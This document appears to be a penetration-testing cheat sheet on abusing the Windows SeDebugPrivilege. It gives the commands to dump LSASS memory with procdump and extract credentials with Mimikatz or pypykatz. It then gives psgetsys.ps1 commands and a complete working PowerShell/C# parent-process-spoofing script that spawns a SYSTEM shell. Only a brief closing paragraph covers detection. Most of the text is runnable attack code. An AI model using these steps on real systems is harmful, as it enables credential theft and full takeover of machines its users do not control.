
SeDebugPrivilege

SeDebugPrivilege ("Debug programs" in User Rights Assignment) lets a process open a handle to any other process or thread with whatever access it asks for, regardless of that object's DACL, including processes running as SYSTEM. Protected processes are the one exception: the privilege does not get you a handle to a PPL such as LSASS when RunAsPPL is set. It is granted to the local Administrators group by default and appears in whoami /priv, usually in the Disabled state; a process has to enable it with AdjustTokenPrivileges before use (Mimikatz's privilege::debug does exactly that). Because a handle to a SYSTEM process is enough to read its memory, inject code, or create a child that inherits its token, the privilege is routinely abused for credential dumping (LSASS) and escalation to SYSTEM with tools such as Mimikatz or Process Hacker. If it is assigned to an account that is not already an administrator, for example a service account, that account is one step away from full system compromise.


Dump LSASS using Procdump & Load into Mimikatz

# procdump enables SeDebugPrivilege in its own token; -ma writes a full memory dump.
# It fails with "access denied" when LSASS runs as a protected process (RunAsPPL),
# and the dump holds no usable secrets when Credential Guard is on.
procdump.exe -accepteula -ma lsass.exe lsass.DMP

# Load it in Mimikatz
mimikatz.exe
mimikatz> privilege::debug
mimikatz> log                      # writes everything that follows to mimikatz.log
mimikatz> sekurlsa::minidump lsass.DMP
mimikatz> sekurlsa::logonpasswords

# OR parse the dump offline with pypykatz on the attack host
pypykatz lsa minidump lsass.DMP



Code Execution as SYSTEM

This is local privilege escalation, not remote code execution: a process that holds SeDebugPrivilege can escalate to SYSTEM by creating a child of an existing SYSTEM process. With the privilege enabled, OpenProcess succeeds on a SYSTEM-owned process even though its DACL would refuse a non-SYSTEM caller; that handle is handed to CreateProcess through the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute, and Windows builds the new process's primary token from the designated parent instead of from the caller. The child therefore starts as SYSTEM with no token duplication and without SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. Two caveats: the child also lands in the parent's session, so pick a SYSTEM process in your own session (winlogon.exe) if you want the spawned cmd.exe on your desktop; and protected processes (smss.exe, csrss.exe, any PPL service) cannot be opened, so they will not work as parents.

Exploit

  1. Use the tasklist /svc command to locate a SYSTEM-level process and its PID (winlogon.exe in your own session is a good choice, see the one-liner below).
  2. Use psgetsystem (psgetsys.ps1) to launch a command as a child of that PID so that it inherits the SYSTEM token.
## USING TASKLIST
tasklist /svc

## Using PowerShell
Get-WmiObject Win32_Process | Where-Object { $_.GetOwner().User -eq 'SYSTEM' } | Select-Object ProcessId, Name
# Process.StartInfo.Environment describes the *current* process, not the target, so filtering on
# USERNAME there never matches anything. -IncludeUserName (needs an elevated shell) does the job.
Get-Process -IncludeUserName | Where-Object { $_.UserName -eq 'NT AUTHORITY\SYSTEM' } | Select-Object Id, ProcessName, SessionId

## Once we have the PID of a SYSTEM process
# Download the psgetsys.ps1 script to the target system

# Import it
. .\psgetsys.ps1

# Run ImpersonateFromParentPid from psgetsys.ps1 (612 is an example PID, use the one you found)
ImpersonateFromParentPid -ppid <parentpid> -command <command to execute> -cmdargs <command arguments>
ImpersonateFromParentPid -ppid 612 -command "C:\Windows\System32\cmd.exe" -cmdargs ""

## One-liner: pick winlogon.exe in the current session (runs as SYSTEM on the interactive desktop,
## so the new window is visible) and run the command as SYSTEM. Select-Object -First 1 matters:
## -ppid takes a single PID, and a filter that returns several PIDs makes the call fail.
$systemPid = (Get-Process -Name winlogon | Where-Object { $_.SessionId -eq (Get-Process -Id $PID).SessionId } | Select-Object -First 1).Id; ImpersonateFromParentPid -ppid $systemPid -command <command_to_execute> -cmdargs <command_arguments>
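To see what psgetsys.ps1 is doing for you, here is the same parent-process trick written out as the underlying Win32 calls from PowerShell. This is an added example, not the psgetsystem project's code and not from the original page; the class name Spawn and the function names Enable-SeDebug and Start-ProcessAsSystemViaParent are mine. It assumes an elevated shell whose token holds SeDebugPrivilege (Disabled is fine, the script enables it) and a non-protected SYSTEM process as the parent.

```powershell
# Added example (not from the original page or from psgetsystem). Win32 via Add-Type.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Spawn {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint Count; public LUID Luid; public uint Attr; }
    [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public uint dwProcessId, dwThreadId; }
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFOEX {            // STARTUPINFOW followed by lpAttributeList
        public uint cb; public string lpReserved, lpDesktop, lpTitle;
        public uint dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public ushort wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
        public IntPtr lpAttributeList;
    }
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr h, uint access, out IntPtr tok);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr tok, bool disableAll, ref TOKEN_PRIVILEGES tp, uint len, IntPtr prev, IntPtr ret);
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool InitializeProcThreadAttributeList(IntPtr list, int count, int flags, ref IntPtr size);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool UpdateProcThreadAttribute(IntPtr list, uint flags, IntPtr attr, ref IntPtr value, IntPtr size, IntPtr prev, IntPtr ret);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool CreateProcess(string app, string cmdline, IntPtr pa, IntPtr ta, bool inherit, uint flags, IntPtr env, string dir, ref STARTUPINFOEX si, out PROCESS_INFORMATION pi);
    [DllImport("kernel32.dll")] public static extern void DeleteProcThreadAttributeList(IntPtr list);
    [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr h);
}
"@

function Enable-SeDebug {
    # Turn the (usually Disabled) privilege on in our own token: TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY = 0x28.
    $tok = [IntPtr]::Zero
    if (-not [Spawn]::OpenProcessToken([Spawn]::GetCurrentProcess(), 0x28, [ref]$tok)) { throw 'OpenProcessToken failed' }
    $luid = New-Object Spawn+LUID
    [void][Spawn]::LookupPrivilegeValue($null, 'SeDebugPrivilege', [ref]$luid)
    $tp = New-Object Spawn+TOKEN_PRIVILEGES
    $tp.Count = 1; $tp.Luid = $luid; $tp.Attr = 2          # SE_PRIVILEGE_ENABLED
    [void][Spawn]::AdjustTokenPrivileges($tok, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    [void][Spawn]::CloseHandle($tok)
    # AdjustTokenPrivileges returns TRUE even when the privilege is not held; 1300 (ERROR_NOT_ALL_ASSIGNED) is the real signal.
    if ($err -eq 1300) { throw 'SeDebugPrivilege is not in this token' }
}

function Start-ProcessAsSystemViaParent([uint32]$ParentPid, [string]$CommandLine) {
    Enable-SeDebug
    # PROCESS_CREATE_PROCESS (0x80) is all the attribute needs. SeDebugPrivilege is what makes this
    # OpenProcess succeed on a SYSTEM-owned process whose DACL would otherwise refuse us.
    $hParent = [Spawn]::OpenProcess(0x80, $false, $ParentPid)
    if ($hParent -eq [IntPtr]::Zero) { throw "OpenProcess($ParentPid) failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    $size = [IntPtr]::Zero
    [void][Spawn]::InitializeProcThreadAttributeList([IntPtr]::Zero, 1, 0, [ref]$size)   # size query
    $list = [Runtime.InteropServices.Marshal]::AllocHGlobal($size)
    if (-not [Spawn]::InitializeProcThreadAttributeList($list, 1, 0, [ref]$size)) { throw 'InitializeProcThreadAttributeList failed' }
    # PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000; the value is a pointer to the parent HANDLE.
    if (-not [Spawn]::UpdateProcThreadAttribute($list, 0, [IntPtr]0x20000, [ref]$hParent, [IntPtr][IntPtr]::Size, [IntPtr]::Zero, [IntPtr]::Zero)) { throw 'UpdateProcThreadAttribute failed' }
    $si = New-Object Spawn+STARTUPINFOEX
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $si.lpAttributeList = $list
    $pi = New-Object Spawn+PROCESS_INFORMATION
    # EXTENDED_STARTUPINFO_PRESENT (0x80000) so lpAttributeList is honoured, CREATE_NEW_CONSOLE (0x10) for a visible window.
    $ok  = [Spawn]::CreateProcess($null, $CommandLine, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x80010, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    [Spawn]::DeleteProcThreadAttributeList($list)
    [Runtime.InteropServices.Marshal]::FreeHGlobal($list)
    [void][Spawn]::CloseHandle($hParent)
    if (-not $ok) { throw "CreateProcess failed, Win32 error $err" }
    [void][Spawn]::CloseHandle($pi.hThread); [void][Spawn]::CloseHandle($pi.hProcess)
    return $pi.dwProcessId
}

# Usage: winlogon.exe in our own session, so the SYSTEM cmd.exe appears on this desktop.
$parentPid = (Get-Process -Name winlogon | Where-Object { $_.SessionId -eq (Get-Process -Id $PID).SessionId } | Select-Object -First 1).Id
$childPid  = Start-ProcessAsSystemViaParent -ParentPid $parentPid -CommandLine 'C:\Windows\System32\cmd.exe /k whoami'
Get-Process -Id $childPid -IncludeUserName | Select-Object Id, ProcessName, UserName, SessionId   # expect NT AUTHORITY\SYSTEM
```

If OpenProcess returns Win32 error 5 here even though Enable-SeDebug did not throw, the chosen parent is a protected process; pick a different SYSTEM PID. Defenders can catch this pattern the same way they catch parent PID spoofing in general: Sysmon Event ID 1 shows the child with winlogon.exe as ParentImage while the handle to winlogon (Event ID 10, PROCESS_CREATE_PROCESS access) came from an unrelated process.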